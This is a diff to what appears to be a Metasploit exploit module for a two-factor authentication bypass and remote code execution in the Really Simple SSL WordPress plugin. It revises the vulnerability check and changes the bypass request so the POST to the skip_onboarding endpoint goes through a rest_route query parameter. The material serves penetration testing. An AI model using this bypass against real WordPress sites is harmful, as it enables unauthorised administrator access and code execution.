Fix check and use rest_route

modules/exploits/multi/http/wp_reallysimplessl_2fa_bypass_rce.rb

@@ -85,21 +85,17 @@ def initialize(info = {})
   def check
     return CheckCode::Unknown('The WordPress site does not appear to be online.') unless wordpress_and_online?
 
-    print_status("WordPress Version: #{wordpress_version}") if wordpress_version
-
     %w[really-simple-ssl really-simple-ssl-pro really-simple-ssl-pro-multisite].each do |slug|
-      case check_plugin_version_from_readme(slug, '9.1.2', '9.0.0').code
+      plugin_check = check_plugin_version_from_readme(slug, '9.1.2', '9.0.0')
+      case plugin_check.code
       when 'appears'
-        print_good("Detected vulnerable plugin slug: #{slug}")
         return CheckCode::Appears("Plugin #{slug} appears to be vulnerable.")
       when 'safe'
-        print_status("Plugin #{slug} is patched or not vulnerable.")
-      when 'unknown'
-        print_status("Plugin #{slug} could not be verified or is not installed.")
+        return CheckCode::Safe("Plugin #{slug} is patched or not vulnerable.")
       end
     end
 
-    CheckCode::Safe('None of the detected plugins are vulnerable.')
+    return CheckCode::Unknown('No vulnerable plugins were detected.')
   end
 
   def exploit
@@ -122,13 +118,16 @@ def bypass_2fa
 
     res = send_request_cgi({
       'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, 'wp-json', 'reallysimplessl', 'v1', 'two_fa', 'skip_onboarding'),
+      'uri' => normalize_uri(target_uri.path),
       'ctype' => 'application/json',
       'data' => {
         'user_id' => user_id,
         'login_nonce' => login_nonce,
         'redirect_to' => '/wp-admin/'
-      }.to_json
+      }.to_json,
+      'vars_get' => {
+        'rest_route' => '/reallysimplessl/v1/two_fa/skip_onboarding'
+      }
     })
 
     raise WordPressNotOnline, 'No response from the target' unless res